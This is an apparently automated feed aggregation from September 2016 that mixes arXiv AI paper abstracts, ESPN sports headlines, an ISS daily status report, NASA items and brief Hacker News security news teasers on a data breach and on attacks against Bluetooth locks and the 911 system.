Graph aggregation is the process of computing a single output graph that constitutes a good compromise between several input graphs, each provided by a different source. One needs to perform graph aggregation in a wide variety of situations, e.g., when applying a voting rule (graphs as preference orders), when consolidating conflicting views regarding the relationships between arguments in a debate (graphs as abstract argumentation frameworks), or when computing a consensus between several alternative clusterings of a given dataset (graphs as equivalence relations). In this paper, we introduce a formal framework for graph aggregation grounded in social choice theory. Our focus is on understanding which properties shared by the individual input graphs will transfer to the output graph returned by a given aggregation rule. We consider both common properties of graphs, such as transitivity and reflexivity, and arbitrary properties expressible in certain fragments of modal logic. Our results establish several connections between the types of properties preserved under aggregation and the choice-theoretic axioms satisfied by the rules used. The most important of these results is a powerful impossibility theorem that generalises Arrow's seminal result for the aggregation of preference orders to a large collection of different types of graphs.



from cs.AI updates on arXiv.org http://ift.tt/2cqKCZD
via IFTTT

Instrumenting an SMT Solver to Solve Hybrid Network Reachability Problems. (arXiv:1609.03847v1 [cs.AI])

PDDL+ planning has its semantics rooted in hybrid automata (HA) and recent work has shown that it can be modeled as a network of HAs. Addressing the complexity of nonlinear PDDL+ planning as HAs requires both space and time efficient reasoning. Unfortunately, existing solvers either do not address nonlinear dynamics or do not natively support networks of automata.

We present a new algorithm, called HNSolve, which guides the variable selection of the dReal Satisfiability Modulo Theories (SMT) solver while reasoning about network encodings of nonlinear PDDL+ planning as HAs. HNSolve tightly integrates with dReal by solving a discrete abstraction of the HA network. HNSolve finds composite runs on the HA network that ignore continuous variables, but respect mode jumps and synchronization labels. HNSolve admissibly detects dead-ends in the discrete abstraction, and posts conflict clauses that prune the SMT solver's search. We evaluate the benefits of our HNSolve algorithm on PDDL+ benchmark problems and demonstrate its performance with respect to prior work.



from cs.AI updates on arXiv.org http://ift.tt/2cEGqJt
via IFTTT

Feynman Machine: The Universal Dynamical Systems Computer. (arXiv:1609.03971v1 [cs.NE])

Efforts at understanding the computational processes in the brain have met with limited success, despite their importance and potential uses in building intelligent machines. We propose a simple new model which draws on recent findings in Neuroscience and the Applied Mathematics of interacting Dynamical Systems. The Feynman Machine is a Universal Computer for Dynamical Systems, analogous to the Turing Machine for symbolic computing, but with several important differences. We demonstrate that networks and hierarchies of simple interacting Dynamical Systems, each adaptively learning to forecast its evolution, are capable of automatically building sensorimotor models of the external and internal world. We identify such networks in mammalian neocortex, and show how existing theories of cortical computation combine with our model to explain the power and flexibility of mammalian intelligence. These findings lead directly to new architectures for machine intelligence. A suite of software implementations has been built based on these principles, and applied to a number of spatiotemporal learning tasks.



from cs.AI updates on arXiv.org http://ift.tt/2cqJJAr
via IFTTT

A Generic Bet-and-run Strategy for Speeding Up Traveling Salesperson and Minimum Vertex Cover. (arXiv:1609.03993v1 [cs.AI])

A common strategy for improving optimization algorithms is to restart the algorithm when it is believed to be trapped in an inferior part of the search space. However, while specific restart strategies have been developed for specific problems (and specific algorithms), restarts are typically not regarded as a general tool to speed up an optimization algorithm. In fact, many optimization algorithms do not employ restarts at all.

Recently, "bet-and-run" was introduced in the context of mixed-integer programming, where first a number of short runs with randomized initial conditions is made, and then the most promising run of these is continued. In this article, we consider two classical NP-complete combinatorial optimization problems, traveling salesperson and minimum vertex cover, and study the effectiveness of different bet-and-run strategies. In particular, our restart strategies do not take any problem knowledge into account, nor are tailored to the optimization algorithm. Therefore, they can be used off-the-shelf. We observe that state-of-the-art solvers for these problems can benefit significantly from restarts on standard benchmark instances.



from cs.AI updates on arXiv.org http://ift.tt/2c7nDAB
via IFTTT

An Evolutionary Algorithm to Learn SPARQL Queries for Source-Target-Pairs: Finding Patterns for Human Associations in DBpedia. (arXiv:1607.07249v3 [cs.AI] UPDATED)

Efficient usage of the knowledge provided by the Linked Data community is often hindered by the need for domain experts to formulate the right SPARQL queries to answer questions. For new questions they have to decide which datasets are suitable and in which terminology and modelling style to phrase the SPARQL query.

In this work we present an evolutionary algorithm to help with this challenging task. Given a training list of source-target node-pair examples our algorithm can learn patterns (SPARQL queries) from a SPARQL endpoint. The learned patterns can be visualised to form the basis for further investigation, or they can be used to predict target nodes for new source nodes.

Amongst others, we apply our algorithm to a dataset of several hundred human associations (such as "circle - square") to find patterns for them in DBpedia. We show the scalability of the algorithm by running it against a SPARQL endpoint loaded with > 7.9 billion triples. Further, we use the resulting SPARQL queries to mimic human associations with a Mean Average Precision (MAP) of 39.9 % and a Recall@10 of 63.9 %.



from cs.AI updates on arXiv.org http://ift.tt/2a7a4Xj
via IFTTT

Orioles: Steve Pearce not in lineup Tuesday because right forearm is bothering him again; will see orthopedic specialist (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Orioles Image: Ubaldo Jimenez takes a photo next to a replica of the Statue of Liberty after becoming a U.S. citizen (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

The Founded Semantics and Constraint Semantics of Logic Rules. (arXiv:1606.06269v2 [cs.LO] UPDATED)

This paper describes a simple new semantics for logic rules, the founded semantics, and its straightforward extension to another simple new semantics, the constraint semantics. The new semantics support unrestricted negation, as well as unrestricted existential and universal quantifications. They are uniquely expressive and intuitive by allowing assumptions about the predicates and rules to be specified explicitly, are completely declarative and easy to understand, and relate cleanly to prior semantics. In addition, founded semantics can be computed in linear time in the size of the ground program.



from cs.AI updates on arXiv.org http://ift.tt/28NZO22
via IFTTT

Teen offspring of anonymous sperm donor find each other through online registry

Three teens — all only children — found each other through an online registry for kids conceived with donated sperm, and immediately formed a ...

from Google Alert - anonymous http://ift.tt/2cu8Ofs
via IFTTT

324,000 Financial Records with CVV Numbers Stolen From A Payment Gateway

Around 324,000 users have likely had their payment records stolen either from payment processor BlueSnap or its customer Regpack; however, neither of the company has admitted a data breach. BlueSnap is a payment provider which allows websites to take payments from customers by offering merchant facilities, whereas RegPack is a global online enrollment platform that uses BlueSnap to process


from The Hacker News http://ift.tt/2cTuPXt
via IFTTT

Anonymous user ffee8e

Name, Anonymous user ffee8e. User since, September 13, 2016. Number of add-ons developed, 1 theme. Average rating of developer's add-ons, Not ...

from Google Alert - anonymous http://ift.tt/2cTtPmb
via IFTTT

Ravens Image: C.J. Mosley shows off all-purple Nike Color Rush uniforms for Nov. 10th Thursday night game vs. Browns (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Orioles OF Adam Jones joins SportsCenter, addresses comments on national anthem protests; watch live in the ESPN App (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

SportsCenter Video: Raul Ibanez \"not surprised\" that Orioles OF Adam Jones spoke out, calls him a \"great kid\" (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

An Integrated Classification Model for Financial Data Mining. (arXiv:1609.02976v1 [cs.AI])

Nowadays, financial data analysis is becoming increasingly important in the business market. As companies collect more and more data from daily operations, they expect to extract useful knowledge from existing collected data to help make reasonable decisions for new customer requests, e.g. user credit category, churn analysis, real estate analysis, etc. Financial institutes have applied different data mining techniques to enhance their business performance. However, simple ap-proach of these techniques could raise a performance issue. Besides, there are very few general models for both understanding and forecasting different finan-cial fields. We present in this paper a new classification model for analyzing fi-nancial data. We also evaluate this model with different real-world data to show its performance.



from cs.AI updates on arXiv.org http://ift.tt/2cSCcu3
via IFTTT

ISS Daily Summary Report – 09/12/2016

Microgravity Science Glovebox (MSG) reconfiguration:  FE-6 performed the teardown and removal of the Heart Cell payload from the MSG.  Heart Cells was completed and returned to the ground on SpaceX-9.  On Tuesday, the crew will install the Selectable Optical Diagnostics Instrument Experiment Diffusion Coefficient Mixture (SODI DCMix)-3 into the MSG work volume.  The Heart Cell investigation studies the human heart, specifically how heart muscle tissue contracts, grows and changes (gene expression) in microgravity and how those changes vary among subjects. Understanding how heart muscle cells, or cardiomyocytes, change in space improves efforts for studying disease, screening drugs and conducting cell replacement therapy for future space missions.  The main purpose of the SODI DCMix-3 investigation is the measurement of diffusion coefficients of selected ternary mixtures taking advantage of the reduced gravity environment available on board the ISS.  Japanese Experiment Module Airlock (JEMAL) Preparation: FE-5 extended the JEMAL Slide Table into the Japanese Experiment Module (JEM) volume and installed the Small Fine Arm (SFA) Attachment Mechanism (SAM) to the table.  FE-5 installed the Multi-Purpose Experiment Platform (MPEP) on the SAM.  The crew reviewed the NanoRack Cubesat Deployer (NRCSD) installation procedure ahead of tomorrow’s installation.  Fine Motor Skills (FMS): FE-5 and FE-6 performed their FMS sessions this morning.  Performing a series of interactive tasks on a touchscreen tablet were completed for the Fine Motor Skills investigation. This investigation is critical during long-duration space missions, particularly those skills needed to interact with technologies required in next-generation space vehicles, spacesuits, and habitats. The crewmember’s fine motor skills are also necessary for performing tasks in transit or on a planetary surface, such as information access, just-in-time training, subsystem maintenance, and medical treatment. Extravehicular Mobility Unit (EMU) Suit Maintenance: The crew performed maintenance tasks on EMU 3006 and EMU 3010 including an EMU swap, a loop scrub, a post-loop scrub water sample, suit and ion filter iodination and an EMU conductivity test.   Japanese Experiment Module (JEM) Network Storage (NeST) Mesh Replacement:  The crew removed the NeST mesh cover that covers the NeST internal fan inlet, changed out the mesh and replace the cover.  The old mesh was vacuumed and stowed.  This is nominal maintenance. Space Station Remote Manipulator System (SSRMS) Operations:  Today, the Robotics Ground Controllers powered up the Mobile Servicing System (MSS) and maneuvered the SSRMS to a park position clear of the Japanese Experiment Module Remote Manipulator System (JEMRMS) NanoRacks CubeSat Deployer #9 (NRCSD 9) deploy operations scheduled for next week.  MSS Performance today was nominal. Today’s Planned Activities All activities were completed unless otherwise noted. Calf Volume Measurement Fine Motor Skills (FINEMOTR) Experiment Ops XF305 Camcorder Settings Adjustment Study of veins in lower extremities JEM Airlock Inner Hatch Open HRTCEL Glove Box Teardown JEM Airlock Slide Table Extension to JPM Monitor 1 JEMAL Hardware Removal SAM Hardware Setup АСУ Receptacle and Hoses Replacement JEMAL Hardware Checkout MPEP Hardware Setup JEMAL Platform Installation Multi-Purpose Experiment Platform (MPEP) Hardware Setup EMU backpack replacement JEM Airlock Monitor Slide Table extension Equipment, work station setup, and Procedure Review for R&R of Replaceable Assembly Panel (ПАС) in DC1 [СOТР]. JEM Airlock Monitor Slide Table extension Initiate EMU Cooling Loop Scrub Part 1 Soyuz 731 Samsung Tablet Recharge, initiate Initiate EMU Cooling Loop Scrub Part 1 СОЖ Maintenance CUBESAT Experiment Procedure Familiarization Start EMU cooling loop scrub RS Photo Cameras Sync Up to Station Time JEM Airlock Slide Table Extension to JPM Monitor 2 EMU Conductivity Test JEM Airlock Inner Hatch Closure JEM Network Storage Mesh Cleaning Soyuz 731 Samsung Tablet Recharge – terminate Exercise Data Downlink via OCA EMU Cooling Loop Maintenance, Deconfiguration Terminate EMU METOX Regeneration Start EMU Metox Regeneration Stow Syringes used in Н2О Conductivity Test  Completed Task List Items ARED Cable Tension JPM1OF7 BBA/LHA R&R JPM1OF1 LHA R&R ELF tool retrieve STFS Flashdrive Scan Ground Activities All activities are on schedule unless otherwise noted. P4 Maximum Voltage Output Test MSS Mnvr clear for JEMRMS NRCSD Operation. ACDU-RC Slide Table Validation Three-Day Look Ahead: Tuesday, 09/13: Lab MCA pumpdown, Hatch Seal Insp, Biomolecule Sequencer, NRCSD #9 install, SODI setup Wednesday, 09/14: NORS O2 transfer, PCHx install, Asian Try Zero-G, ELF troubleshooting Thursday, 09/15: ARED 6 month, JPM window inspection, MDCA H/W replace, ELF troubleshooting QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Idle Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/2ct8ei2
via IFTTT

How to Hack Smart Bluetooth Locks and IoT Devices — Check this Out

Bluetooth Low Energy, also known as Bluetooth Smart or Bluetooth 4, is the leading protocol designed for connecting IoT devices, medical equipment, smart homes and like most emerging technologies, security is often an afterthought. As devices become more and more embedded in our daily lives, vulnerabilities have real impact on our digital and physical security. Enter the Bluetooth lock,


from The Hacker News http://ift.tt/2cBfqcy
via IFTTT

Here's How Hackers Can Disrupt '911' Emergency System and Put Your Life at Risk

What would it take for hackers to significantly disrupt the US' 911 emergency call system? It only takes 6,000 Smartphones. Yes, you heard it right! According to new research published last week, a malicious attacker can leverage a botnet of infected smartphone devices located throughout the country to knock the 911 service offline in an entire state, and possibly the whole United States,


from The Hacker News http://ift.tt/2cWqH7E
via IFTTT

PoW bucket bloom

An interesting side problem in keysafe's design is that keysafe servers, which run as tor hidden services, allow anonymous data storage and retrieval.

from Google Alert - anonymous http://ift.tt/2cs0pFZ
via IFTTT

The Rivers of the Mississippi Watershed

The Mississippi Watershed is the largest drainage basin in North America at 3.2 million square kilometers in area. The USGS has created a database of this area which indicates the direction of waterflow at each point. By assembling these directions into streamflows, it is possible to trace the path of water from every point of the area to the mouth of the Mississippi in the Gulf of Mexico. This animation starts with the points furthest from the Gulf and reveals the streams and rivers as a steady progression towards the mouth of the Mississippi until all the major rivers are revealed. The speed of the reveal of the rivers is not dependent on the actual speed of the water flow. The reveal proceeds at a constant velocity along each river path, timed so that all reveals reach the mouth of the Mississippi at the same time.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2chhN5U
via IFTTT

Philae Lander Found on Comet 67P


A little spacecraft that was presumed lost has now been found. In 2014, the Philae lander slowly descended from its parent Rosetta spacecraft to the nucleus of Comet C67/P Churyumov-Gerasimenko. At the surface, after a harpoon malfunction, the lander bounced softly twice and eventually sent back images from an unknown location. Earlier this month, though, Rosetta swooped low enough to spot its cub. The meter-sized Philae is seen on the far right of the main image, with inset images showing both a zoom out and a zoom in. At the end of this month, Rosetta itself will be directed to land on 67P, but Rosetta's landing will be harder and, although taking unique images and data, will bring the mission to an end. via NASA http://ift.tt/2cpSrAn

Monday, September 12, 2016

MLB: Orioles' Adam Jones tells USA Today players not protesting during anthem because "baseball is a white man's sport" (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Episodic Exploration for Deep Deterministic Policies: An Application to StarCraft Micromanagement Tasks. (arXiv:1609.02993v1 [cs.AI])

We consider scenarios from the real-time strategy game StarCraft as new benchmarks for reinforcement learning algorithms. We propose micromanagement tasks, which present the problem of the short-term, low-level control of army members during a battle. From a reinforcement learning point of view, these scenarios are challenging because the state-action space is very large, and because there is no obvious feature representation for the state-action evaluation function. We describe our approach to tackle the micromanagement scenarios with deep neural network controllers from raw state features given by the game engine. In addition, we present a heuristic reinforcement learning algorithm which combines direct exploration in the policy space and backpropagation. This algorithm allows for the collection of traces for learning using deterministic policies, which appears much more efficient than, for example, {\epsilon}-greedy exploration. Experiments show that with this algorithm, we successfully learn non-trivial strategies for scenarios with armies of up to 15 agents, where both Q-learning and REINFORCE struggle.



from cs.AI updates on arXiv.org http://ift.tt/2cSCwch
via IFTTT

A Tube-and-Droplet-based Approach for Representing and Analyzing Motion Trajectories. (arXiv:1609.03058v1 [cs.CV])

Trajectory analysis is essential in many applications. In this paper, we address the problem of representing motion trajectories in a highly informative way, and consequently utilize it for analyzing trajectories. Our approach first leverages the complete information from given trajectories to construct a thermal transfer field which provides a context-rich way to describe the global motion pattern in a scene. Then, a 3D tube is derived which depicts an input trajectory by integrating its surrounding motion patterns contained in the thermal transfer field. The 3D tube effectively: 1) maintains the movement information of a trajectory, 2) embeds the complete contextual motion pattern around a trajectory, 3) visualizes information about a trajectory in a clear and unified way. We further introduce a droplet-based process. It derives a droplet vector from a 3D tube, so as to characterize the high-dimensional 3D tube information in a simple but effective way. Finally, we apply our tube-and-droplet representation to trajectory analysis applications including trajectory clustering, trajectory classification & abnormality detection, and 3D action recognition. Experimental comparisons with state-of-the-art algorithms demonstrate the effectiveness of our approach.



from cs.AI updates on arXiv.org http://ift.tt/2crzPQP
via IFTTT